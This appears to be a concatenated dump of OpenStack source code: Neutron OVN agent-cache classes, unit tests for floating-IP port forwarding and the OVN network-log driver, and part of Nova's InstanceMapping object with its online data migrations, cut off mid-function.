external_ids = self.chassis_from_private(chassis_private).external_ids
if ('enable-chassis-as-gw' not in
external_ids.get('ovn-cms-options', [])):
self.__class__ = ControllerAgent
class MetadataAgent(NeutronAgent):
agent_type = ovn_const.OVN_METADATA_AGENT
binary = 'neutron-ovn-metadata-agent'
@property
def alive(self):
# If ovn-controller is down, then metadata agent is down even
# if the metadata-agent binary is updating external_ids.
try:
if not AgentCache()[self.chassis_private.name].alive:
return False
except KeyError:
return False
return super().alive
@property
def nb_cfg(self):
return int(self.chassis_private.external_ids.get(
ovn_const.OVN_AGENT_METADATA_SB_CFG_KEY, 0))
@staticmethod
def id_from_chassis_private(chassis_private):
return chassis_private.external_ids.get(
ovn_const.OVN_AGENT_METADATA_ID_KEY)
@property
def agent_id(self):
return self.id_from_chassis_private(self.chassis_private)
@property
def description(self):
return self.chassis_private.external_ids.get(
ovn_const.OVN_AGENT_METADATA_DESC_KEY, '')
@utils.SingletonDecorator
class AgentCache:
def __init__(self, driver=None):
# This is just to make pylint happy because it doesn't like calls to
# AgentCache() with no arguments, despite init only being called the
# first time--and we do really want a driver passed in.
if driver is None:
raise ValueError(_("driver cannot be None"))
self.agents = {}
self.driver = driver
def __iter__(self):
# Copying self.agents will avoid any issue during the iteration if an
# agent is added or deleted.
_agents = copy.copy(self.agents)
return iter(_agents.values())
def __getitem__(self, key):
return self.agents[key]
def update(self, agent_type, row, updated_at=None, clear_down=False):
cls = NeutronAgent.types[agent_type]
try:
agent = self.agents[cls.id_from_chassis_private(row)]
agent.update(row, updated_at=updated_at, clear_down=clear_down)
except KeyError:
agent = NeutronAgent.from_type(agent_type, row, self.driver,
updated_at=updated_at)
self.agents[agent.agent_id] = agent
return agent
def __delitem__(self, agent_id):
del self.agents[agent_id]
def agents_by_chassis_private(self, chassis_private):
# Get unique agent ids based on the chassis_private
agent_ids = {cls.id_from_chassis_private(chassis_private)
for cls in NeutronAgent.types.values()}
# Return the cached agents of agent_ids whose keys are in the cache
return (agent for agent in self if agent.agent_id in agent_ids)
def get_agents(self, filters=None):
filters = filters or {}
agent_list = []
for agent in self:
agent_dict = agent.as_dict()
if all(agent_dict[k] in v for k, v in filters.items()):
agent_list.append(agent)
return agent_list
```
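The `NeutronAgent.types` registry above is built with `__init_subclass__`, which Python invokes once for every subclass definition. A stripped-down sketch of the same pattern (class and attribute names here are illustrative):
```python
class Handler:
    types = {}

    def __init_subclass__(cls, **kwargs):
        super().__init_subclass__(**kwargs)
        # Every concrete subclass registers itself under its declared
        # kind, so a factory can dispatch without a hand-written table.
        Handler.types[cls.kind] = cls

    @classmethod
    def from_kind(cls, kind, *args, **kwargs):
        return cls.types[kind](*args, **kwargs)


class PingHandler(Handler):
    kind = 'ping'


assert Handler.types['ping'] is PingHandler
```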
#### File: unit/extensions/test_floating_ip_port_forwarding.py
```python
from unittest import mock
from neutron_lib import context
from oslo_utils import uuidutils
from webob import exc
from neutron.tests.unit.api import test_extensions
from neutron.tests.unit.extensions import \
test_expose_port_forwarding_in_fip as test_fip_pf
from neutron.tests.unit.extensions import test_l3
_uuid = uuidutils.generate_uuid
class FloatingIPPortForwardingTestCase(test_l3.L3BaseForIntTests,
                                       test_l3.L3NatTestCaseMixin):
fmt = 'json'
def setUp(self):
mock.patch('neutron.api.rpc.handlers.resources_rpc.'
'ResourcesPushRpcApi').start()
svc_plugins = (test_fip_pf.PF_PLUGIN_NAME, test_fip_pf.L3_PLUGIN,
'neutron.services.qos.qos_plugin.QoSPlugin')
ext_mgr = test_fip_pf.ExtendFipPortForwardingExtensionManager()
        super(FloatingIPPortForwardingTestCase, self).setUp(
            ext_mgr=ext_mgr, service_plugins=svc_plugins)
self.ext_api = test_extensions.setup_extensions_middleware(ext_mgr)
def _create_fip_port_forwarding(self, fmt,
floating_ip_id,
external_port,
internal_port,
protocol,
internal_ip_address,
internal_port_id,
tenant_id=None,
description=None,
external_port_range=None,
internal_port_range=None):
tenant_id = tenant_id or _uuid()
data = {'port_forwarding': {
"protocol": protocol,
"internal_ip_address": internal_ip_address,
"internal_port_id": internal_port_id}
}
if external_port_range and internal_port_range:
data['port_forwarding'][
'internal_port_range'] = internal_port_range
data['port_forwarding'][
'external_port_range'] = external_port_range
else:
data['port_forwarding']['internal_port'] = internal_port
data['port_forwarding']['external_port'] = external_port
if description:
data['port_forwarding']['description'] = description
fip_pf_req = self._req(
'POST', 'floatingips', data,
fmt or self.fmt, id=floating_ip_id,
subresource='port_forwardings')
fip_pf_req.environ['neutron.context'] = context.Context(
'', tenant_id, is_admin=True)
return fip_pf_req.get_response(self.ext_api)
def _update_fip_port_forwarding(self, fmt, floating_ip_id,
port_forwarding_id, **kwargs):
        port_forwarding = dict(kwargs)
data = {'port_forwarding': port_forwarding}
fip_pf_req = self._req(
'PUT', 'floatingips', data,
fmt or self.fmt, id=floating_ip_id,
sub_id=port_forwarding_id,
subresource='port_forwardings')
return fip_pf_req.get_response(self.ext_api)
def test_create_floatingip_port_forwarding_with_port_number_0(self):
with self.network() as ext_net:
network_id = ext_net['network']['id']
self._set_net_external(network_id)
with self.subnet(ext_net, cidr='10.10.10.0/24'), \
self.router() as router, \
self.subnet(cidr='11.0.0.0/24') as private_subnet, \
self.port(private_subnet) as port:
self._add_external_gateway_to_router(
router['router']['id'],
network_id)
self._router_interface_action(
'add', router['router']['id'],
private_subnet['subnet']['id'],
None)
fip = self._make_floatingip(
self.fmt,
network_id)
self.assertIsNone(fip['floatingip'].get('port_id'))
res = self._create_fip_port_forwarding(
self.fmt, fip['floatingip']['id'],
2222, 0,
'tcp',
port['port']['fixed_ips'][0]['ip_address'],
port['port']['id'])
self.assertEqual(exc.HTTPBadRequest.code, res.status_int)
res = self._create_fip_port_forwarding(
self.fmt, fip['floatingip']['id'],
0, 22,
'tcp',
port['port']['fixed_ips'][0]['ip_address'],
port['port']['id'])
self.assertEqual(exc.HTTPBadRequest.code, res.status_int)
def test_create_floatingip_port_forwarding_with_description(self):
with self.network() as ext_net:
network_id = ext_net['network']['id']
self._set_net_external(network_id)
with self.subnet(ext_net, cidr='10.10.10.0/24'), \
self.router() as router, \
self.subnet(cidr='172.16.17.32/24') as private_subnet, \
self.port(private_subnet) as port:
self._add_external_gateway_to_router(
router['router']['id'],
network_id)
self._router_interface_action(
'add', router['router']['id'],
private_subnet['subnet']['id'],
None)
fip = self._make_floatingip(
self.fmt,
network_id)
self.assertIsNone(fip['floatingip'].get('port_id'))
res = self._create_fip_port_forwarding(
self.fmt, fip['floatingip']['id'],
2222, 22,
'tcp',
port['port']['fixed_ips'][0]['ip_address'],
port['port']['id'],
description="blablablabla")
self.assertEqual(exc.HTTPCreated.code, res.status_int)
pf_body = self.deserialize(self.fmt, res)
self.assertEqual(
"blablablabla", pf_body['port_forwarding']['description'])
def test_create_floatingip_port_forwarding_with_ranges(self):
internal_port_range = '22:24'
external_port_range = '2222:2224'
with self.network() as ext_net:
network_id = ext_net['network']['id']
self._set_net_external(network_id)
with self.subnet(ext_net, cidr='10.10.10.0/24'), \
self.router() as router, \
self.subnet(cidr='172.16.17.32/24') as private_subnet, \
self.port(private_subnet) as port:
self._add_external_gateway_to_router(
router['router']['id'],
network_id)
self._router_interface_action(
'add', router['router']['id'],
private_subnet['subnet']['id'],
None)
fip = self._make_floatingip(
self.fmt,
network_id)
self.assertIsNone(fip['floatingip'].get('port_id'))
res = self._create_fip_port_forwarding(
self.fmt, fip['floatingip']['id'],
None, None,
'tcp',
port['port']['fixed_ips'][0]['ip_address'],
port['port']['id'],
internal_port_range=internal_port_range,
external_port_range=external_port_range)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
pf_body = self.deserialize(self.fmt, res)
self.assertEqual(
internal_port_range,
pf_body['port_forwarding']['internal_port_range'])
self.assertEqual(
external_port_range,
pf_body['port_forwarding']['external_port_range'])
def test_create_floatingip_port_forwarding_with_ranges_port_collisions(
self):
internal_port_range1 = '22:24'
internal_port_range2 = '23:25'
external_port_range1 = '2222:2224'
external_port_range2 = '2223:2225'
with self.network() as ext_net:
network_id = ext_net['network']['id']
self._set_net_external(network_id)
with self.subnet(ext_net, cidr='10.10.10.0/24'), \
self.router() as router, \
self.subnet(cidr='172.16.17.32/24') as private_subnet, \
self.port(private_subnet) as port:
self._add_external_gateway_to_router(
router['router']['id'],
network_id)
self._router_interface_action(
'add', router['router']['id'],
private_subnet['subnet']['id'],
None)
fip = self._make_floatingip(
self.fmt,
network_id)
self.assertIsNone(fip['floatingip'].get('port_id'))
self._create_fip_port_forwarding(
self.fmt, fip['floatingip']['id'],
None, None,
'tcp',
port['port']['fixed_ips'][0]['ip_address'],
port['port']['id'],
internal_port_range=internal_port_range1,
external_port_range=external_port_range1)
response = self._create_fip_port_forwarding(
self.fmt, fip['floatingip']['id'],
None, None,
'tcp',
port['port']['fixed_ips'][0]['ip_address'],
port['port']['id'],
internal_port_range=internal_port_range2,
external_port_range=external_port_range2)
self.assertEqual(exc.HTTPBadRequest.code,
response.status_int)
def test_update_floatingip_port_forwarding_with_dup_internal_port(self):
with self.network() as ext_net:
network_id = ext_net['network']['id']
self._set_net_external(network_id)
with self.subnet(ext_net, cidr='10.10.10.0/24'), \
self.router() as router, \
self.subnet(cidr='172.16.17.32/24') as private_subnet, \
self.port(private_subnet) as port:
self._add_external_gateway_to_router(
router['router']['id'],
network_id)
self._router_interface_action(
'add', router['router']['id'],
private_subnet['subnet']['id'],
None)
fip1 = self._make_floatingip(
self.fmt,
network_id)
self.assertIsNone(fip1['floatingip'].get('port_id'))
self._create_fip_port_forwarding(
self.fmt, fip1['floatingip']['id'],
2222, 22,
'tcp',
port['port']['fixed_ips'][0]['ip_address'],
port['port']['id'],
description="blablablabla")
fip2 = self._make_floatingip(
self.fmt,
network_id)
fip_pf_response = self._create_fip_port_forwarding(
self.fmt, fip2['floatingip']['id'],
2222, 23,
'tcp',
port['port']['fixed_ips'][0]['ip_address'],
port['port']['id'],
description="blablablabla")
update_res = self._update_fip_port_forwarding(
self.fmt, fip2['floatingip']['id'],
fip_pf_response.json['port_forwarding']['id'],
**{'internal_port': 22})
self.assertEqual(exc.HTTPBadRequest.code,
update_res.status_int)
```
#### File: drivers/ovn/test_driver.py
```python
from unittest import mock
from neutron_lib.plugins import constants as plugin_constants
from neutron_lib.services.logapi import constants as log_const
from oslo_utils import uuidutils
from ovsdbapp.backend.ovs_idl import idlutils
from neutron.common import utils as neutron_utils
from neutron.common.ovn import constants as ovn_const
from neutron.common.ovn import utils as ovn_utils
from neutron.services.logapi.drivers.ovn import driver as ovn_driver
from neutron.tests import base
from neutron.tests.unit import fake_resources
FAKE_CFG_RATE = 123
FAKE_CFG_BURST = 321
class TestOVNDriver(base.BaseTestCase):
def setUp(self):
super().setUp()
self.context = mock.Mock()
self.plugin_driver = mock.Mock()
self.plugin_driver.nb_ovn = fake_resources.FakeOvsdbNbOvnIdl()
self.log_plugin = mock.Mock()
get_mock_log_plugin = lambda alias: self.log_plugin if (
alias == plugin_constants.LOG_API) else None
self.fake_get_dir_object = mock.patch(
"neutron_lib.plugins.directory.get_plugin",
side_effect=get_mock_log_plugin).start()
self.fake_get_sgs_attached_to_port = mock.patch(
"neutron.services.logapi.common.db_api._get_sgs_attached_to_port",
return_value=[]).start()
self.fake_cfg_network_log = mock.patch(
"oslo_config.cfg.CONF.network_log").start()
self.fake_cfg_network_log.local_output_log_base = None
self.fake_cfg_network_log.rate_limit = FAKE_CFG_RATE
self.fake_cfg_network_log.burst_limit = FAKE_CFG_BURST
self._log_driver_property = None
@property
def _nb_ovn(self):
return self.plugin_driver.nb_ovn
@property
def _log_driver(self):
if self._log_driver_property is None:
self._log_driver_property = ovn_driver.OVNDriver.create(
self.plugin_driver)
return self._log_driver_property
def _log_driver_reinit(self):
self._log_driver_property = None
return self._log_driver
def _fake_meter(self, **kwargs):
meter_defaults_dict = {
'uuid': uuidutils.generate_uuid(),
'bands': [mock.Mock(uuid='test_band')],
'unit': 'pktps',
'fair': [True],
}
meter_obj_dict = {**meter_defaults_dict, **kwargs}
return mock.Mock(**meter_obj_dict)
def _fake_meter_band(self, **kwargs):
meter_band_defaults_dict = {
'uuid': 'test_band',
'rate': self.fake_cfg_network_log.rate_limit,
'burst_size': self.fake_cfg_network_log.burst_limit,
}
meter_band_obj_dict = {**meter_band_defaults_dict, **kwargs}
return mock.Mock(**meter_band_obj_dict)
def test_create(self):
driver = self._log_driver
self.assertEqual(self.log_plugin, driver._log_plugin)
self.assertEqual(self.plugin_driver, driver.plugin_driver)
self.assertEqual(self.plugin_driver.nb_ovn, driver.ovn_nb)
def test_create_meter_name(self):
driver = self._log_driver
self.assertEqual("acl_log_meter", driver.meter_name)
test_log_base = neutron_utils.get_rand_name()
self.fake_cfg_network_log.local_output_log_base = test_log_base
driver2 = self._log_driver_reinit()
self.assertEqual(test_log_base, driver2.meter_name)
def test__create_ovn_fair_meter(self):
mock_find_rows = mock.Mock()
mock_find_rows.execute.return_value = None
self._nb_ovn.db_find_rows.return_value = mock_find_rows
self._log_driver._create_ovn_fair_meter(self._nb_ovn.transaction)
self.assertFalse(self._nb_ovn.meter_del.called)
self.assertTrue(self._nb_ovn.meter_add.called)
self.assertFalse(
self._nb_ovn.transaction.return_value.__enter__.called)
self._nb_ovn.meter_add.assert_called_once_with(
name="acl_log_meter",
unit="pktps",
rate=FAKE_CFG_RATE,
fair=True,
burst_size=FAKE_CFG_BURST,
may_exist=False,
external_ids={ovn_const.OVN_DEVICE_OWNER_EXT_ID_KEY:
log_const.LOGGING_PLUGIN})
def test__create_ovn_fair_meter_unchanged(self):
mock_find_rows = mock.Mock()
mock_find_rows.execute.return_value = [self._fake_meter()]
self._nb_ovn.db_find_rows.return_value = mock_find_rows
self._nb_ovn.lookup.side_effect = lambda table, key: (
self._fake_meter_band() if key == "test_band" else None)
self._log_driver._create_ovn_fair_meter(self._nb_ovn.transaction)
self.assertFalse(self._nb_ovn.meter_del.called)
self.assertFalse(self._nb_ovn.meter_add.called)
def test__create_ovn_fair_meter_changed(self):
mock_find_rows = mock.Mock()
mock_find_rows.execute.return_value = [self._fake_meter(fair=[False])]
self._nb_ovn.db_find_rows.return_value = mock_find_rows
self._nb_ovn.lookup.return_value = self._fake_meter_band()
self._log_driver._create_ovn_fair_meter(self._nb_ovn.transaction)
self.assertTrue(self._nb_ovn.meter_del.called)
self.assertTrue(self._nb_ovn.meter_add.called)
def test__create_ovn_fair_meter_band_changed(self):
mock_find_rows = mock.Mock()
mock_find_rows.execute.return_value = [self._fake_meter()]
self._nb_ovn.db_find_rows.return_value = mock_find_rows
self._nb_ovn.lookup.return_value = self._fake_meter_band(rate=666)
self._log_driver._create_ovn_fair_meter(self._nb_ovn.transaction)
self.assertTrue(self._nb_ovn.meter_del.called)
self.assertTrue(self._nb_ovn.meter_add.called)
def test__create_ovn_fair_meter_band_missing(self):
mock_find_rows = mock.Mock()
mock_find_rows.execute.return_value = [self._fake_meter()]
self._nb_ovn.db_find_rows.return_value = mock_find_rows
self._nb_ovn.lookup.side_effect = idlutils.RowNotFound
self._log_driver._create_ovn_fair_meter(self._nb_ovn.transaction)
self.assertTrue(self._nb_ovn.meter_del.called)
self.assertTrue(self._nb_ovn.meter_add.called)
class _fake_acl():
def __init__(self, name=None, **acl_dict):
acl_defaults_dict = {
"name": [name] if name else [],
"action": ovn_const.ACL_ACTION_ALLOW_RELATED,
}
self.__dict__ = {**acl_defaults_dict, **acl_dict}
def _fake_pg_dict(self, **kwargs):
pg_defaults_dict = {
"name": ovn_utils.ovn_port_group_name(uuidutils.generate_uuid()),
"acls": []
}
return {**pg_defaults_dict, **kwargs}
def _fake_pg(self, **kwargs):
pg_defaults_dict = {
"name": ovn_utils.ovn_port_group_name(uuidutils.generate_uuid()),
"acls": []
}
pg_dict = {**pg_defaults_dict, **kwargs}
return mock.Mock(**pg_dict)
def _fake_log_obj(self, **kwargs):
log_obj_defaults_dict = {
'uuid': uuidutils.generate_uuid(),
'resource_id': None,
'target_id': None,
'event': log_const.ALL_EVENT,
}
log_obj_obj_dict = {**log_obj_defaults_dict, **kwargs}
return mock.Mock(**log_obj_obj_dict)
def test__pgs_from_log_obj_pg_all(self):
expected_pgs = [self._fake_pg()]
with mock.patch.object(self._log_driver, '_pgs_all',
return_value=expected_pgs) as mock_pgs_all:
log_obj = self._fake_log_obj()
pgs = self._log_driver._pgs_from_log_obj(self.context, log_obj)
mock_pgs_all.assert_called_once()
self.assertEqual(expected_pgs, pgs)
def test__pgs_from_log_obj_empty(self):
with mock.patch.object(self._log_driver, '_pgs_all',
return_value=[]) as mock_pgs_all:
self._nb_ovn.lookup.side_effect = idlutils.RowNotFound
log_obj = self._fake_log_obj(target_id='target_id')
pgs = self._log_driver._pgs_from_log_obj(self.context, log_obj)
mock_pgs_all.assert_not_called()
self._nb_ovn.lookup.assert_called_once_with(
"Port_Group", ovn_const.OVN_DROP_PORT_GROUP_NAME)
self.fake_get_sgs_attached_to_port.assert_called_once_with(
self.context, 'target_id')
self.assertEqual([], pgs)
def test__pgs_from_log_obj_pg_drop(self):
with mock.patch.object(self._log_driver, '_pgs_all',
return_value=[]) as mock_pgs_all:
pg = self._fake_pg()
def _mock_lookup(_pg_table, pg_name):
if pg_name == ovn_const.OVN_DROP_PORT_GROUP_NAME:
return pg
raise idlutils.RowNotFound
self._nb_ovn.lookup.side_effect = _mock_lookup
log_obj = self._fake_log_obj(resource_id='resource_id')
pgs = self._log_driver._pgs_from_log_obj(self.context, log_obj)
mock_pgs_all.assert_not_called()
self.assertEqual(2, self._nb_ovn.lookup.call_count)
self.assertEqual([{'acls': [], 'name': pg.name}], pgs)
def test__pgs_from_log_obj_pg(self):
with mock.patch.object(self._log_driver, '_pgs_all',
return_value=[]) as mock_pgs_all:
pg = self._fake_pg()
self._nb_ovn.lookup.return_value = pg
log_obj = self._fake_log_obj(resource_id='resource_id',
target_id='target_id',
event=log_const.ACCEPT_EVENT)
pgs = self._log_driver._pgs_from_log_obj(self.context, log_obj)
mock_pgs_all.assert_not_called()
self._nb_ovn.lookup.assert_called_once_with(
"Port_Group", ovn_utils.ovn_port_group_name('resource_id'))
self.assertEqual([{'acls': [], 'name': pg.name}], pgs)
def test__pgs_from_log_obj_port(self):
with mock.patch.object(self._log_driver, '_pgs_all',
return_value=[]) as mock_pgs_all:
sg_id = uuidutils.generate_uuid()
pg_name = ovn_utils.ovn_port_group_name(sg_id)
pg = self._fake_pg(name=pg_name)
self._nb_ovn.lookup.return_value = pg
log_obj = self._fake_log_obj(target_id='target_id',
event=log_const.ACCEPT_EVENT)
self.fake_get_sgs_attached_to_port.return_value = [sg_id]
pgs = self._log_driver._pgs_from_log_obj(self.context, log_obj)
mock_pgs_all.assert_not_called()
self._nb_ovn.lookup.assert_called_once_with("Port_Group", pg_name)
self.fake_get_sgs_attached_to_port.assert_called_once_with(
self.context, 'target_id')
self.assertEqual([{'acls': [], 'name': pg.name}], pgs)
@mock.patch.object(ovn_driver.LOG, 'info')
def test__remove_acls_log(self, m_info):
pg_dict = self._fake_pg_dict(acls=['acl1', 'acl2'])
self._log_driver._remove_acls_log([pg_dict], self._nb_ovn.transaction)
info_args, _info_kwargs = m_info.call_args_list[0]
self.assertIn('Cleared %d, Not found %d (out of %d visited) ACLs',
info_args[0])
self._nb_ovn.lookup.assert_has_calls([
mock.call('ACL', 'acl1', default=None),
mock.call('ACL', 'acl2', default=None)])
self.assertEqual(len(pg_dict["acls"]), info_args[1])
self.assertEqual(len(pg_dict["acls"]) - 2, info_args[2])
self.assertEqual(len(pg_dict["acls"]), info_args[3])
self.assertEqual(len(pg_dict["acls"]), self._nb_ovn.db_set.call_count)
@mock.patch.object(ovn_driver.LOG, 'info')
def test__remove_acls_log_missing_acls(self, m_info):
pg_dict = self._fake_pg_dict(acls=['acl1', 'acl2', 'acl3'])
def _mock_lookup(_pg_table, acl_uuid, default):
if acl_uuid == 'acl3':
return None
return self._fake_acl()
self._nb_ovn.lookup.side_effect = _mock_lookup
self._log_driver._remove_acls_log([pg_dict], self._nb_ovn.transaction)
info_args, _info_kwargs = m_info.call_args_list[0]
self.assertEqual(len(pg_dict["acls"]) - 1, info_args[1])
self.assertEqual(len(pg_dict["acls"]) - 2, info_args[2])
self.assertEqual(len(pg_dict["acls"]), info_args[3])
self.assertEqual(len(pg_dict["acls"]) - 1,
self._nb_ovn.db_set.call_count)
@mock.patch.object(ovn_driver.LOG, 'info')
def test__remove_acls_log_with_log_name(self, m_info):
pg_dict = self._fake_pg_dict(acls=['acl1', 'acl2', 'acl3', 'acl4'])
log_name = 'test_obj_name'
used_name = 'test_used_name'
def _mock_lookup(_pg_table, acl_uuid, default):
if acl_uuid == 'acl2':
return self._fake_acl(name=used_name)
return self._fake_acl(name=log_name)
self._nb_ovn.lookup.side_effect = _mock_lookup
self._log_driver._remove_acls_log([pg_dict], self._nb_ovn.transaction,
log_name)
info_args, _info_kwargs = m_info.call_args_list[0]
self.assertIn('Cleared %d, Not found %d (out of %d visited) ACLs',
info_args[0])
self.assertIn('for network log {}'.format(log_name), info_args[0])
self.assertEqual(len(pg_dict["acls"]) - 1, info_args[1])
self.assertEqual(len(pg_dict["acls"]) - 4, info_args[2])
self.assertEqual(len(pg_dict["acls"]), info_args[3])
self.assertEqual(len(pg_dict["acls"]) - 1,
self._nb_ovn.db_set.call_count)
@mock.patch.object(ovn_driver.LOG, 'info')
def test__set_acls_log(self, m_info):
pg_dict = self._fake_pg_dict(acls=['acl1', 'acl2', 'acl3', 'acl4'])
log_name = 'test_obj_name'
used_name = 'test_used_name'
def _mock_lookup(_pg_table, acl_uuid):
if acl_uuid == 'acl3':
return self._fake_acl()
return self._fake_acl(name=used_name)
self._nb_ovn.lookup.side_effect = _mock_lookup
actions_enabled = self._log_driver._acl_actions_enabled(
self._fake_log_obj(event=log_const.ALL_EVENT))
self._log_driver._set_acls_log([pg_dict], self._nb_ovn.transaction,
actions_enabled, log_name)
info_args, _info_kwargs = m_info.call_args_list[0]
self.assertIn('Set %d (out of %d visited) ACLs for network log %s',
info_args[0])
self.assertEqual(1, info_args[1])
self.assertEqual(len(pg_dict["acls"]), info_args[2])
self.assertEqual(log_name, info_args[3])
self.assertEqual(1, self._nb_ovn.db_set.call_count)
``` |
{
"source": "10088/nova",
"score": 2
} |
#### File: nova/objects/instance_mapping.py
```python
import collections
from oslo_log import log as logging
from oslo_utils import versionutils
from sqlalchemy import orm
from sqlalchemy.orm import exc as orm_exc
from sqlalchemy import sql
from sqlalchemy.sql import func
from nova import context as nova_context
from nova.db.api import api as api_db_api
from nova.db.api import models as api_models
from nova import exception
from nova.i18n import _
from nova import objects
from nova.objects import base
from nova.objects import cell_mapping
from nova.objects import fields
from nova.objects import virtual_interface
LOG = logging.getLogger(__name__)
@base.NovaObjectRegistry.register
class InstanceMapping(base.NovaTimestampObject, base.NovaObject):
# Version 1.0: Initial version
# Version 1.1: Add queued_for_delete
# Version 1.2: Add user_id
VERSION = '1.2'
fields = {
'id': fields.IntegerField(read_only=True),
'instance_uuid': fields.UUIDField(),
'cell_mapping': fields.ObjectField('CellMapping', nullable=True),
'project_id': fields.StringField(),
'user_id': fields.StringField(),
'queued_for_delete': fields.BooleanField(default=False),
}
def obj_make_compatible(self, primitive, target_version):
super(InstanceMapping, self).obj_make_compatible(primitive,
target_version)
target_version = versionutils.convert_version_to_tuple(target_version)
if target_version < (1, 2) and 'user_id' in primitive:
del primitive['user_id']
if target_version < (1, 1):
if 'queued_for_delete' in primitive:
del primitive['queued_for_delete']
def obj_load_attr(self, attrname):
if attrname == 'user_id':
LOG.error('The unset user_id attribute of an unmigrated instance '
'mapping should not be accessed.')
raise exception.ObjectActionError(
action='obj_load_attr',
reason=_('attribute user_id is not lazy-loadable'))
super(InstanceMapping, self).obj_load_attr(attrname)
def _update_with_cell_id(self, updates):
cell_mapping_obj = updates.pop("cell_mapping", None)
if cell_mapping_obj:
updates["cell_id"] = cell_mapping_obj.id
return updates
@staticmethod
def _from_db_object(context, instance_mapping, db_instance_mapping):
for key in instance_mapping.fields:
db_value = db_instance_mapping.get(key)
if key == 'cell_mapping':
# cell_mapping can be None indicating that the instance has
# not been scheduled yet.
if db_value:
db_value = cell_mapping.CellMapping._from_db_object(
context, cell_mapping.CellMapping(), db_value)
if key == 'user_id' and db_value is None:
# NOTE(melwitt): If user_id is NULL, we can't set the field
# because it's non-nullable. We don't plan for any code to read
# the user_id field at this time, so skip setting it.
continue
setattr(instance_mapping, key, db_value)
instance_mapping.obj_reset_changes()
instance_mapping._context = context
return instance_mapping
@staticmethod
@api_db_api.context_manager.reader
def _get_by_instance_uuid_from_db(context, instance_uuid):
db_mapping = context.session.query(api_models.InstanceMapping)\
.options(orm.joinedload(api_models.InstanceMapping.cell_mapping))\
.filter(api_models.InstanceMapping.instance_uuid == instance_uuid)\
.first()
if not db_mapping:
raise exception.InstanceMappingNotFound(uuid=instance_uuid)
return db_mapping
@base.remotable_classmethod
def get_by_instance_uuid(cls, context, instance_uuid):
db_mapping = cls._get_by_instance_uuid_from_db(context, instance_uuid)
return cls._from_db_object(context, cls(), db_mapping)
@staticmethod
@api_db_api.context_manager.writer
def _create_in_db(context, updates):
db_mapping = api_models.InstanceMapping()
db_mapping.update(updates)
db_mapping.save(context.session)
# NOTE: This is done because a later access will trigger a lazy load
# outside of the db session so it will fail. We don't lazy load
# cell_mapping on the object later because we never need an
# InstanceMapping without the CellMapping.
db_mapping.cell_mapping
return db_mapping
@base.remotable
def create(self):
changes = self.obj_get_changes()
changes = self._update_with_cell_id(changes)
if 'queued_for_delete' not in changes:
# NOTE(danms): If we are creating a mapping, it should be
# not queued_for_delete (unless we are being asked to
# create one in deleted state for some reason).
changes['queued_for_delete'] = False
db_mapping = self._create_in_db(self._context, changes)
self._from_db_object(self._context, self, db_mapping)
@staticmethod
@api_db_api.context_manager.writer
def _save_in_db(context, instance_uuid, updates):
db_mapping = context.session.query(
api_models.InstanceMapping).filter_by(
instance_uuid=instance_uuid).first()
if not db_mapping:
raise exception.InstanceMappingNotFound(uuid=instance_uuid)
db_mapping.update(updates)
# NOTE: This is done because a later access will trigger a lazy load
# outside of the db session so it will fail. We don't lazy load
# cell_mapping on the object later because we never need an
# InstanceMapping without the CellMapping.
db_mapping.cell_mapping
context.session.add(db_mapping)
return db_mapping
@base.remotable
def save(self):
changes = self.obj_get_changes()
changes = self._update_with_cell_id(changes)
try:
db_mapping = self._save_in_db(self._context, self.instance_uuid,
changes)
except orm_exc.StaleDataError:
# NOTE(melwitt): If the instance mapping has been deleted out from
# under us by conductor (delete requested while booting), we will
# encounter a StaleDataError after we retrieved the row and try to
# update it after it's been deleted. We can treat this like an
# instance mapping not found and allow the caller to handle it.
raise exception.InstanceMappingNotFound(uuid=self.instance_uuid)
self._from_db_object(self._context, self, db_mapping)
self.obj_reset_changes()
@staticmethod
@api_db_api.context_manager.writer
def _destroy_in_db(context, instance_uuid):
result = context.session.query(api_models.InstanceMapping).filter_by(
instance_uuid=instance_uuid).delete()
if not result:
raise exception.InstanceMappingNotFound(uuid=instance_uuid)
@base.remotable
def destroy(self):
self._destroy_in_db(self._context, self.instance_uuid)
@api_db_api.context_manager.writer
def populate_queued_for_delete(context, max_count):
cells = objects.CellMappingList.get_all(context)
processed = 0
for cell in cells:
ims = (
            # Get a direct list of instance mappings for this cell which
            # do not yet have a defined value for queued_for_delete
context.session.query(api_models.InstanceMapping)
.filter(
api_models.InstanceMapping.queued_for_delete == None) # noqa
.filter(api_models.InstanceMapping.cell_id == cell.id)
.limit(max_count).all())
ims_by_inst = {im.instance_uuid: im for im in ims}
if not ims_by_inst:
# If there is nothing from this cell to migrate, move on.
continue
with nova_context.target_cell(context, cell) as cctxt:
filters = {'uuid': list(ims_by_inst.keys()),
'deleted': True,
'soft_deleted': True}
instances = objects.InstanceList.get_by_filters(
cctxt, filters, expected_attrs=[])
# Walk through every deleted instance that has a mapping needing
# to be updated and update it
for instance in instances:
im = ims_by_inst.pop(instance.uuid)
im.queued_for_delete = True
context.session.add(im)
processed += 1
# Any instances we did not just hit must be not-deleted, so
# update the remaining mappings
for non_deleted_im in ims_by_inst.values():
non_deleted_im.queued_for_delete = False
context.session.add(non_deleted_im)
processed += 1
max_count -= len(ims)
if max_count <= 0:
break
return processed, processed
@api_db_api.context_manager.writer
def populate_user_id(context, max_count):
cells = objects.CellMappingList.get_all(context)
cms_by_id = {cell.id: cell for cell in cells}
done = 0
unmigratable_ims = False
ims = (
# Get a list of instance mappings which do not have user_id populated.
# We need to include records with queued_for_delete=True because they
# include SOFT_DELETED instances, which could be restored at any time
# in the future. If we don't migrate SOFT_DELETED instances now, we
# wouldn't be able to retire this migration code later. Also filter
# out the marker instance created by the virtual interface migration.
context.session.query(api_models.InstanceMapping)
.filter_by(user_id=None)
.filter(api_models.InstanceMapping.project_id !=
virtual_interface.FAKE_UUID)
.limit(max_count).all())
found = len(ims)
ims_by_inst_uuid = {}
inst_uuids_by_cell_id = collections.defaultdict(set)
for im in ims:
ims_by_inst_uuid[im.instance_uuid] = im
inst_uuids_by_cell_id[im.cell_id].add(im.instance_uuid)
for cell_id, inst_uuids in inst_uuids_by_cell_id.items():
# We cannot migrate instance mappings that don't have a cell yet.
if cell_id is None:
unmigratable_ims = True
continue
with nova_context.target_cell(context, cms_by_id[cell_id]) as cctxt:
            # We need to migrate SOFT_DELETED instances because they could be
            # restored at any time in the future. If we don't migrate them
            # here, we won't be able to remove this or any other interim
            # online data migration code later.
# NOTE: it's not possible to query only for SOFT_DELETED instances.
# We must query for both deleted and SOFT_DELETED instances.
filters = {'uuid': inst_uuids}
try:
instances = objects.InstanceList.get_by_filters(
cctxt, filters, expected_attrs=[])
except Exception as exp:
